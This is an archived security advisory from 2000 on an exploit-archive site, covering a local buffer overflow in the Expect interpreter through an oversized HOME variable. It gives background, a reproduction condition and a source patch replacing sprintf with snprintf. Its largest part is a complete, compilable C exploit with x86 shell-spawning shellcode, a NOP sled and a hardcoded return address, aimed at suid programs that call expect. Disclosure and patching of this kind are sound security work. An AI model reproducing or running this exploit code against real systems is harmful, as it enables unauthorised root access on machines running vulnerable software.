exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

hhp-expect_adv0017.txt

hhp-expect_adv0017.txt
Posted Dec 31, 2000
Authored by hhp, Isox | Site hhp-programming.net

Expect v5.31.8 and v5.28.1 contains local buffer overflows. It is possible to exploit any suid/sgid expect application.

tags | exploit, overflow, local
SHA-256 | 8a69e04abc43d9ebdcd6198de5a7b5431ff007a5dca07c47115be8df48b6e33d

hhp-expect_adv0017.txt

Change Mirror Download
-------------------------------------------------------------------------------
hhp adv-17 Sec-Advisory/Exploit/Patch
www.hhp-programming.net
-------------------------------------------------------------------------------
Topic: Expect.
Versions: 5.31.8 and 5.28.1, maybe others.
Date: 12/12/2000
Platforms: Tested on Slackware Linux 7.x, maybe others.
Authors: Read credits.
-------------------------------------------------------------------------------
THIS ADVISORY IS BASED UPON SELF TESTING RESULTS. WE DO NOT GARAUNTEE THE IN-
FORMATION STATED BELOW WILL BE CORRECT IN ALL SITUATIONS.


1) BACKGROUND

- Expect.
Expect is a program to control interactive applications. These applications
interactively prompt and expect a user to enter keystrokes in response. By
using Expect, you can write simple scripts to automate these interactions.


2) OVERVIEW

- It is possible to cause Expect to segfault due to impropper bounds checking.
EIP can then be overwritten and the flow of execution changed. It is poss-
ible to exploit any script that uses the the Expect program(Scripting lang).


3) SETBACK

- If an Execpt script is suid/sgid it most likely is not possible to gain the
set privleges due to the execution of Expect before any permission changes
take effect.


4) REPRODUCTION

- If an application is suid/sgid and sets the effective UID or GID withouth
cleaning the environment then calls upon Expect itself or via an Expect
script, it is possible to exploit the Expect scripting interpreter.


5) EXPLOIT

--------------------- SNIP ----------------------------------------------------
/* hhp-expect_smash.c (12/11/00)
*
* expect (/usr/bin/expect) buffer overflow.
* Tested 5.31.8 and 5.28.1, slackware 7.x (Maybe others).
*
* By: isox
* Site: www.hhp-programming.net
* Advisory: www.hhp-programming.net/ouradvisories/hhp-expect_adv%2317.txt
*/

#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90
#define OFFSET 0
#define BUFLEN 416
#define RET 0xbffff580 /* Slackware 7.1 */
#define EXPECT "/usr/bin/expect"

char code[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x66\x31\xc0\x66\x31"
"\xdb\xb0\x2e\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
"\xdc\xff\xff\xff/bin/sh\x69";

void usage(char *arg) {
fprintf(stderr, "\nUsage: %s [offset up/down] [eip]\n\n", arg);
fprintf(stderr, "Examples:\n");
fprintf(stderr, "\t%s 347 up -=- Default EIP increased by 347
bytes\n", arg);
fprintf(stderr, "\t%s 347 down -=- Default EIP decreased by 347
bytes\n", arg);
fprintf(stderr, "\t%s 429 up 0x%lx -=- EIP set to 0x%lx and increased by
429 bytes\n", arg, RET, RET + 429);
fprintf(stderr, "\t%s 429 down 0x%lx -=- EIP set to 0x%lx and decreased by
429 bytes\n\n", arg, RET, RET - 429);
exit(1);
}


int main(int argc, char *argv[]) {
char *buf, *p;
long *addressp, address;
int offset=OFFSET;
int i;


if((argc < 3) || (argc > 4))
usage(argv[0]);

if(argc == 3) {
if(!strcmp(argv[2], "up")) {
address = RET + atoi(argv[1]);
printf("Increasing offset by: %d\n", atoi(argv[1]));
printf("Increasing EIP to: 0x%x\n\n", RET + atoi(argv[1]));
}

if(!strcmp(argv[2], "down")) {
address = RET - atoi(argv[1]);
printf("Decreasing offset by: %d\n", atoi(argv[1]));
printf("Decreasing EIP to: 0x%x\n\n", RET - atoi(argv[1]));
}
}

if(argc >= 4) {
if(!strcmp(argv[2], "up")) {
address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16));
printf("Increasing offset by: %d\n", atoi(argv[1]));
printf("Increasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) + atoi(
argv[1])));
}
if(!strcmp(argv[2], "down")) {
address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16));
printf("Decreasing offset by: %d\n", atoi(argv[1]));
printf("Decreasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) - atoi(
argv[1])));
}
}


if (!(buf = (char *)malloc(BUFLEN))) {
printf("Can't allocate memory.\n");
exit(-1);
}

p = buf;
addressp = (long *) p;

for (i = 0; i < BUFLEN; i+=4) {
*(addressp++) = address;
}

for (i = 0; i < (BUFLEN - strlen(code) - 4); i++) {
buf[i] = NOP;
}

p = buf + (BUFLEN - strlen(code) - 4);

for (i = 0; i < strlen(code); i++)
*(p++) = code[i];

buf[BUFLEN] = '\0';


setenv("HOME", buf, 1);
system(EXPECT);
}
--------------------- SNAP ----------------------------------------------------


6) SOLUTION

- Apply this patch made and tested on version 5.31.8. To apply the patch,
take this snippet out and name it hhp-expect.patch in the expect-5.31 dir-
ectory. Then type... 'patch -p1 < hhp-expect.patch' and finish with a
'make' and a 'make install'

--------------------- SNIP ----------------------------------------------------
--- old/exp_main_sub.c Sun Dec 17 04:01:50 2000
+++ new/exp_main_sub.c Sun Dec 17 04:02:46 2000
@@ -761,14 +761,14 @@
}
}
if (my_rc) {
- char file[200];
+ char file[256];
char *home;
int fd;
char *getenv();
if ((NULL != (home = getenv("DOTDIR"))) ||
(NULL != (home = getenv("HOME")))) {
- sprintf(file,"%s/.expect.rc",home);
+ snprintf(file, 256-1, "%s/.expect.rc", home); // Temporary fix.
if (-1 != (fd = open(file,0))) {
if (TCL_ERROR == (rc = Tcl_EvalFile(interp,file))) {
expErrorLog("error executing file: %s\r\n",file);

--------------------- SNAP ----------------------------------------------------


7) CREDITS

- Ben Lull (isox) (plix@chainsawbeer.com) - Bug finding, exploit, testing.
- Cody Tubbs (loophole) (pigspigs@yahoo.com) - Advisory, patch, testing.

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close